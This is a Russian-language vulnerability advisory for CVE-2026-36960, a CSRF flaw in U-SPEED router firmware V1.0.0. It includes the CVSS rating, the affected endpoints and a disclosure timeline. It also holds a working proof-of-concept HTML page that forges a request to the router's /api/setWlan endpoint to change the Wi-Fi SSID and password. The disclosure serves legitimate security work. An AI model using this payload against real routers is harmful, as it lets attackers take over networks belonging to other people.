
Доказательство концепции эксплойта для CVE-2026-36960, уязвимости CSRF в прошивке маршрутизатора U-SPEED, позволяющей несанкционированное изменение конфигурации с помощью поддельных запросов.
Идентификатор CVE: CVE-2026-36960 Дата: 2026-04-29 Обнаружил: Kirubel Solomne Производитель: U-SPEED Продукт: Маршрутизатор U-SPEED Версия прошивки: V1.0.0 CWE: CWE-352 — Межсайтовая подделка запроса (CSRF)
Прошивка маршрутизатора U-SPEED V1.0.0 не реализует механизмы защиты от CSRF, такие как анти-CSRF токены или строгую проверку заголовков Origin/Referer для административных API-эндпоинтов. Злоумышленник может создать вредоносную веб-страницу, которая отправляет поддельные HTTP-запросы к эндпоинтам конфигурации. Если аутентифицированный администратор посетит вредоносную веб-страницу, маршрутизатор обработает запрос как легитимное административное действие.
Оценка CVSS v3.1: 8.8 (Высокая)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| Метрика | Значение |
|---|
| Вектор атаки | Сеть |
| Сложность атаки | Низкая |
| Требуемые привилегии | Отсутствуют |
| Взаимодействие с пользователем | Требуется |
| Влияние на конфиденциальность | Высокое |
| Влияние на целостность | Высокое |
| Влияние на доступность | Высокое |
| Эндпоинт | Функция |
|---|---|
/api/setWlan | Конфигурация беспроводной сети |
/api/telnet | Конфигурация службы Telnet |
| Прочие эндпоинты конфигурации | Различные административные функции |
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
Ожидаемое поведение: Запрос должен быть отклонён из-за отсутствия CSRF-токена. Фактическое поведение: Маршрутизатор принимает и обрабатывает поддельный запрос.
| Дата | Событие |
|---|---|
| 2026-04-29 | Уязвимость обнаружена |
| 2026-04-29 | Сообщено в MITRE |
| 2026-04-29 | Присвоен CVE-2026-36960 |
| 2026-04-29 | Публичное раскрытие |